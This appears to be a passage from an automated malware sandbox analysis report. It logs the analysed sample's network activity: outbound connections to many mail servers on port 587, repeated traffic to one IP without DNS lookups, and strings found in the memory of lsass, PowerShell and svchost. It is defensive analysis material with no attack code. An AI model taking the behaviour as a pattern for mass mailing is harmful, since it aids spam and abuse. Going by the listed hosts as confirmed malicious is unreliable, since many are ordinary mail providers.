                      Source: global trafficTCP traffic: 192.168.2.5:49807 -> 216.69.141.113:587
                      Source: global trafficTCP traffic: 192.168.2.5:49808 -> 104.196.163.23:587
                      Source: global trafficTCP traffic: 192.168.2.5:49809 -> 168.0.132.203:587
                      Source: global trafficTCP traffic: 192.168.2.5:49811 -> 213.209.1.147:587
                      Source: global trafficTCP traffic: 192.168.2.5:49817 -> 18.190.56.214:587
                      Source: global trafficTCP traffic: 192.168.2.5:49818 -> 185.159.32.4:587
                      Source: global trafficTCP traffic: 192.168.2.5:49819 -> 52.16.25.241:587
                      Source: global trafficTCP traffic: 192.168.2.5:49820 -> 129.187.254.228:587
                      Source: global trafficTCP traffic: 192.168.2.5:49821 -> 162.0.229.59:587
                      Source: global trafficTCP traffic: 192.168.2.5:49822 -> 34.102.221.37:587
                      Source: global trafficTCP traffic: 192.168.2.5:49823 -> 120.138.68.152:587
                      Source: global trafficTCP traffic: 192.168.2.5:49830 -> 52.147.208.244:587
                      Source: global trafficTCP traffic: 192.168.2.5:49831 -> 81.7.169.194:587
                      Source: global trafficTCP traffic: 192.168.2.5:49832 -> 64.59.136.142:587
                      Source: global trafficTCP traffic: 192.168.2.5:49836 -> 64.136.52.50:587
                      Source: global trafficTCP traffic: 192.168.2.5:49838 -> 138.102.156.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:49840 -> 191.252.112.195:587
                      Source: global trafficTCP traffic: 192.168.2.5:49841 -> 106.153.226.2:587
                      Source: global trafficTCP traffic: 192.168.2.5:49843 -> 217.74.65.52:587
                      Source: global trafficTCP traffic: 192.168.2.5:49844 -> 109.234.162.66:587
                      Source: global trafficTCP traffic: 192.168.2.5:49845 -> 129.213.180.114:587
                      Source: global trafficTCP traffic: 192.168.2.5:49846 -> 130.117.54.106:587
                      Source: global trafficTCP traffic: 192.168.2.5:49847 -> 104.47.71.202:587
                      Source: global trafficTCP traffic: 192.168.2.5:49848 -> 31.193.252.56:587
                      Source: global trafficTCP traffic: 192.168.2.5:49850 -> 175.135.254.129:587
                      Source: global trafficTCP traffic: 192.168.2.5:49853 -> 5.183.8.124:587
                      Source: global trafficTCP traffic: 192.168.2.5:49854 -> 78.100.10.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:49856 -> 182.248.170.226:587
                      Source: global trafficTCP traffic: 192.168.2.5:49858 -> 104.143.9.110:587
                      Source: global trafficTCP traffic: 192.168.2.5:49859 -> 52.101.73.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:49860 -> 64.136.52.44:587
                      Source: global trafficTCP traffic: 192.168.2.5:49862 -> 88.99.236.167:587
                      Source: global trafficTCP traffic: 192.168.2.5:49868 -> 129.159.110.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:49869 -> 51.140.191.223:587
                      Source: global trafficTCP traffic: 192.168.2.5:61673 -> 94.152.219.6:587
                      Source: global trafficTCP traffic: 192.168.2.5:61674 -> 92.43.203.144:587
                      Source: global trafficTCP traffic: 192.168.2.5:61675 -> 193.70.18.144:587
                      Source: global trafficTCP traffic: 192.168.2.5:61677 -> 82.194.66.60:587
                      Source: global trafficTCP traffic: 192.168.2.5:61679 -> 194.181.93.175:587
                      Source: global trafficTCP traffic: 192.168.2.5:61690 -> 179.190.34.5:587
                      Source: global trafficTCP traffic: 192.168.2.5:61691 -> 180.37.199.27:587
                      Source: global trafficTCP traffic: 192.168.2.5:61693 -> 15.197.130.221:587
                      Source: global trafficTCP traffic: 192.168.2.5:61697 -> 72.52.179.174:587
                      Source: global trafficTCP traffic: 192.168.2.5:61699 -> 81.169.145.97:587
                      Source: global trafficTCP traffic: 192.168.2.5:61703 -> 138.100.200.12:587
                      Source: global trafficTCP traffic: 192.168.2.5:61704 -> 41.193.157.227:587
                      Source: global trafficTCP traffic: 192.168.2.5:61705 -> 149.106.174.170:587
                      Source: global trafficTCP traffic: 192.168.2.5:61706 -> 52.223.34.187:587
                      Source: global trafficTCP traffic: 192.168.2.5:61709 -> 47.43.18.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:61712 -> 209.71.208.9:587
                      Source: global trafficTCP traffic: 192.168.2.5:61713 -> 169.61.124.242:587
                      Source: global trafficTCP traffic: 192.168.2.5:61721 -> 85.13.146.212:587
                      Source: global trafficTCP traffic: 192.168.2.5:61722 -> 13.57.89.168:587
                      Source: global trafficTCP traffic: 192.168.2.5:61728 -> 85.93.219.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:61729 -> 52.101.10.14:587
                      Source: global trafficTCP traffic: 192.168.2.5:61734 -> 173.203.187.14:587
                      Source: global trafficTCP traffic: 192.168.2.5:61735 -> 178.250.10.199:587
                      Source: global trafficTCP traffic: 192.168.2.5:61737 -> 88.86.121.146:587
                      Source: global trafficTCP traffic: 192.168.2.5:61739 -> 93.104.207.155:587
                      Source: global trafficTCP traffic: 192.168.2.5:61743 -> 104.247.81.12:587
                      Source: global trafficTCP traffic: 192.168.2.5:61745 -> 64.190.63.222:587
                      Source: global trafficTCP traffic: 192.168.2.5:61747 -> 200.40.31.8:587
                      Source: global trafficTCP traffic: 192.168.2.5:61748 -> 162.215.97.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:61750 -> 74.125.26.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:61752 -> 13.251.65.157:587
                      Source: global trafficTCP traffic: 192.168.2.5:61755 -> 212.227.15.41:587
                      Source: global trafficTCP traffic: 192.168.2.5:61759 -> 191.6.216.99:587
                      Source: global trafficTCP traffic: 192.168.2.5:61762 -> 64.233.186.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:61766 -> 2.207.150.234:587
                      Source: global trafficTCP traffic: 192.168.2.5:61768 -> 81.2.195.67:587
                      Source: global trafficTCP traffic: 192.168.2.5:61774 -> 5.175.14.63:587
                      Source: global trafficTCP traffic: 192.168.2.5:61778 -> 24.222.0.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:61782 -> 62.169.183.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:61783 -> 13.248.169.48:587
                      Source: global trafficTCP traffic: 192.168.2.5:61784 -> 35.201.134.121:587
                      Source: global trafficTCP traffic: 192.168.2.5:61786 -> 15.197.192.55:587
                      Source: global trafficTCP traffic: 192.168.2.5:61788 -> 89.161.204.64:587
                      Source: global trafficTCP traffic: 192.168.2.5:61789 -> 131.188.16.206:587
                      Source: global trafficTCP traffic: 192.168.2.5:61791 -> 81.169.145.84:587
                      Source: global trafficTCP traffic: 192.168.2.5:61792 -> 104.21.59.103:587
                      Source: global trafficTCP traffic: 192.168.2.5:61793 -> 45.119.84.172:587
                      Source: global trafficTCP traffic: 192.168.2.5:61797 -> 195.251.255.215:587
                      Source: global trafficTCP traffic: 192.168.2.5:61799 -> 154.70.144.136:587
                      Source: global trafficTCP traffic: 192.168.2.5:61802 -> 129.158.253.212:587
                      Source: global trafficTCP traffic: 192.168.2.5:61803 -> 216.113.192.36:587
                      Source: global trafficTCP traffic: 192.168.2.5:61805 -> 45.33.20.235:587
                      Source: global trafficTCP traffic: 192.168.2.5:61809 -> 62.121.128.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:61812 -> 147.182.160.18:587
                      Source: global trafficTCP traffic: 192.168.2.5:61815 -> 64.59.128.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:61816 -> 220.73.163.120:587
                      Source: global trafficTCP traffic: 192.168.2.5:61824 -> 200.42.138.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:61828 -> 62.149.188.200:587
                      Source: global trafficTCP traffic: 192.168.2.5:61830 -> 84.116.6.19:587
                      Source: global trafficTCP traffic: 192.168.2.5:61831 -> 13.32.87.77:587
                      Source: global trafficTCP traffic: 192.168.2.5:61833 -> 109.72.89.197:587
                      Source: global trafficTCP traffic: 192.168.2.5:61834 -> 15.197.240.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:61842 -> 79.96.164.169:587
                      Source: global trafficTCP traffic: 192.168.2.5:61845 -> 202.124.241.196:587
                      Source: global trafficTCP traffic: 192.168.2.5:61850 -> 77.78.119.119:587
                      Source: global trafficTCP traffic: 192.168.2.5:61851 -> 109.61.0.141:587
                      Source: global trafficTCP traffic: 192.168.2.5:61854 -> 103.224.212.215:587
                      Source: global trafficTCP traffic: 192.168.2.5:61855 -> 15.197.142.173:587
                      Source: global trafficTCP traffic: 192.168.2.5:61857 -> 91.121.56.64:587
                      Source: global trafficTCP traffic: 192.168.2.5:61858 -> 91.235.53.41:587
                      Source: global trafficTCP traffic: 192.168.2.5:61861 -> 178.210.170.80:587
                      Source: global trafficTCP traffic: 192.168.2.5:61862 -> 195.202.128.4:587
                      Source: global trafficTCP traffic: 192.168.2.5:61863 -> 75.2.24.159:587
                      Source: global trafficTCP traffic: 192.168.2.5:61864 -> 212.35.60.35:587
                      Source: global trafficTCP traffic: 192.168.2.5:61868 -> 203.134.71.82:587
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00401015 connect,connect,WSAIoctl,select,recv,LocalFree,6_2_00401015
                      Source: global trafficDNS traffic detected: DNS query: hofmann-geraberg.de
                      Source: global trafficDNS traffic detected: DNS query: nate.com
                      Source: global trafficDNS traffic detected: DNS query: noos.fr
                      Source: global trafficDNS traffic detected: DNS query: securesmtp.robbievox.co.uk
                      Source: global trafficDNS traffic detected: DNS query: mail.planet.nl
                      Source: global trafficDNS traffic detected: DNS query: smtp-01.tld.t-online.de
                      Source: global trafficDNS traffic detected: DNS query: smtp.bbox.fr
                      Source: global trafficDNS traffic detected: DNS query: cajememotors.com
                      Source: global trafficDNS traffic detected: DNS query: mail.windstream.net
                      Source: global trafficDNS traffic detected: DNS query: yaho.de
                      Source: global trafficDNS traffic detected: DNS query: mail.venter.com.br
                      Source: global trafficDNS traffic detected: DNS query: smtp.frontier.com
                      Source: global trafficDNS traffic detected: DNS query: womenjapan.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.ntlworld.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.centrum.cz
                      Source: global trafficDNS traffic detected: DNS query: mail.dk
                      Source: global trafficDNS traffic detected: DNS query: mx2c28.carrierzone.com
                      Source: global trafficDNS traffic detected: DNS query: mx.generic-isp.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.virgilio.it
                      Source: global trafficDNS traffic detected: DNS query: tpcompany.co.jp
                      Source: global trafficDNS traffic detected: DNS query: softbank.ne.jp
                      Source: global trafficDNS traffic detected: DNS query: airrivals.pl
                      Source: global trafficDNS traffic detected: DNS query: secure.rlmorgan.co.uk
                      Source: global trafficDNS traffic detected: DNS query: i.softbank.jp
                      Source: global trafficDNS traffic detected: DNS query: out.teccart.online
                      Source: global trafficDNS traffic detected: DNS query: securesmtp.fada.co.jp
                      Source: global trafficDNS traffic detected: DNS query: aspmx2.googlemail.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.a1.net
                      Source: global trafficDNS traffic detected: DNS query: securesmtp.mamasimon.de
                      Source: global trafficDNS traffic detected: DNS query: mail.hereiam.plus.com
                      Source: global trafficDNS traffic detected: DNS query: ms5.ncv.ne.jp
                      Source: global trafficDNS traffic detected: DNS query: smtp.telenet.be
                      Source: global trafficDNS traffic detected: DNS query: dominy.f9.co.uk
                      Source: global trafficDNS traffic detected: DNS query: out.marin.club.ne.jp
                      Source: global trafficDNS traffic detected: DNS query: mail.atlanticbb.net
                      Source: global trafficDNS traffic detected: DNS query: ASPMX3.GOOGLEMAIL.COM
                      Source: global trafficDNS traffic detected: DNS query: mx.convertor-3gp.com
                      Source: global trafficDNS traffic detected: DNS query: marriot.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.etica.conc-bmw.com
                      Source: global trafficDNS traffic detected: DNS query: ccj.com
                      Source: global trafficDNS traffic detected: DNS query: mx10.se.isp-net.nl
                      Source: global trafficDNS traffic detected: DNS query: imsinc01.filter2.lastspam.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.ucr.ac.cr
                      Source: global trafficDNS traffic detected: DNS query: mx.websitebod.com
                      Source: global trafficDNS traffic detected: DNS query: out.sonar.co.hu
                      Source: global trafficDNS traffic detected: DNS query: dr-thomas-maier.de
                      Source: global trafficDNS traffic detected: DNS query: mail.rikkebruun.dk
                      Source: global trafficDNS traffic detected: DNS query: secure.pflege.de
                      Source: global trafficDNS traffic detected: DNS query: avweb.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.atlanticexpress.ca
                      Source: global trafficDNS traffic detected: DNS query: smtp.centrum.sk
                      Source: global trafficDNS traffic detected: DNS query: mx.adephia.net
                      Source: global trafficDNS traffic detected: DNS query: gruesshaber.de
                      Source: global trafficDNS traffic detected: DNS query: secure.southeasternacademy.org
                      Source: global trafficDNS traffic detected: DNS query: smtp.lachambre.be
                      Source: global trafficDNS traffic detected: DNS query: securesmtp.wtqudu.com
                      Source: global trafficDNS traffic detected: DNS query: out.lykiabotanika.com
                      Source: global trafficDNS traffic detected: DNS query: route1.mx.cloudflare.net
                      Source: global trafficDNS traffic detected: DNS query: rogers.com
                      Source: global trafficDNS traffic detected: DNS query: morningnotes.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.rockfiend.co.uk
                      Source: global trafficDNS traffic detected: DNS query: smtp.oaktreefinancial.ca
                      Source: global trafficDNS traffic detected: DNS query: mail.i.ua
                      Source: global trafficDNS traffic detected: DNS query: constelacionesmadrid.com
                      Source: global trafficDNS traffic detected: DNS query: mail.moenchs-waldhotel.de
                      Source: global trafficDNS traffic detected: DNS query: extensic.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.ivan-elkin.name
                      Source: global trafficDNS traffic detected: DNS query: smtp.skynet.be
                      Source: global trafficDNS traffic detected: DNS query: canesoverhere.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.virgin.net
                      Source: global trafficDNS traffic detected: DNS query: mail.americanaugers.jp
                      Source: global trafficDNS traffic detected: DNS query: alt2.aspmx.l.google.com
                      Source: global trafficDNS traffic detected: DNS query: mail.hot.ee
                      Source: global trafficDNS traffic detected: DNS query: smtp.freemail.hu
                      Source: global trafficDNS traffic detected: DNS query: peterboroughcab-org-uk.mail.protection.outlook.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.xplornet.ca
                      Source: global trafficDNS traffic detected: DNS query: mx-1.dpoczta.pl
                      Source: global trafficDNS traffic detected: DNS query: out.arenaholidays.net
                      Source: global trafficDNS traffic detected: DNS query: secure.grandwayne.com
                      Source: global trafficDNS traffic detected: DNS query: kefgames.net
                      Source: global trafficDNS traffic detected: DNS query: smtp.ig.com.br
                      Source: global trafficDNS traffic detected: DNS query: mail.fivefigureweeks.com
                      Source: global trafficDNS traffic detected: DNS query: mail.uniquedestinationsllc.com
                      Source: global trafficDNS traffic detected: DNS query: hyacinthhouse.se
                      Source: global trafficDNS traffic detected: DNS query: smtp.bbsyd.dk
                      Source: global trafficDNS traffic detected: DNS query: smtp.irvineproject.cn
                      Source: global trafficDNS traffic detected: DNS query: smtp.vermessungsseiten.de
                      Source: global trafficDNS traffic detected: DNS query: secure.elitter.net
                      Source: global trafficDNS traffic detected: DNS query: smtp.gelsennet.de
                      Source: global trafficDNS traffic detected: DNS query: smtp.ziggo.nl
                      Source: global trafficDNS traffic detected: DNS query: mail.firstfriends.com
                      Source: global trafficDNS traffic detected: DNS query: securesmtp.sohns-ruit.de
                      Source: global trafficDNS traffic detected: DNS query: out.rapeli.de
                      Source: global trafficDNS traffic detected: DNS query: upcmail.nl
                      Source: global trafficDNS traffic detected: DNS query: mail.optonline.net
                      Source: global trafficDNS traffic detected: DNS query: smtp.online.nl
                      Source: global trafficDNS traffic detected: DNS query: smtp.cogeco.ca
                      Source: global trafficDNS traffic detected: DNS query: smtp.tmd-tunelmuhendisligi.com
                      Source: global trafficDNS traffic detected: DNS query: smtp.me.com
                      Source: global trafficDNS traffic detected: DNS query: mx.fkksol.com
                      Source: lsass.exe, 00000009.00000000.2329003857.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3586736112.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3581324769.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328869509.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328930813.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3583122176.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: lsass.exe, 00000009.00000000.2329003857.00000140AE09D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328636024.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: powershell.exe, 00000004.00000002.2470640101.00000263FD4C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3581324769.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328869509.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328930813.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3583122176.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: lsass.exe, 00000009.00000000.2329003857.00000140AE09D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328636024.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328930813.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3583122176.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: lsass.exe, 00000009.00000000.2329003857.00000140AE09D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328636024.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: svchost.exe, 00000027.00000000.2489910290.000002406682A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.3569453617.0000024066865000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: lsass.exe, 00000009.00000000.2328636024.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: lsass.exe, 00000009.00000000.2328636024.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                      Source: lsass.exe, 00000009.00000000.2328540843.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3568613188.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: powershell.exe, 00000004.00000002.2431183217.0000026390210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329003857.00000140AE09D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328636024.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328930813.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3583122176.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3581324769.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328869509.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
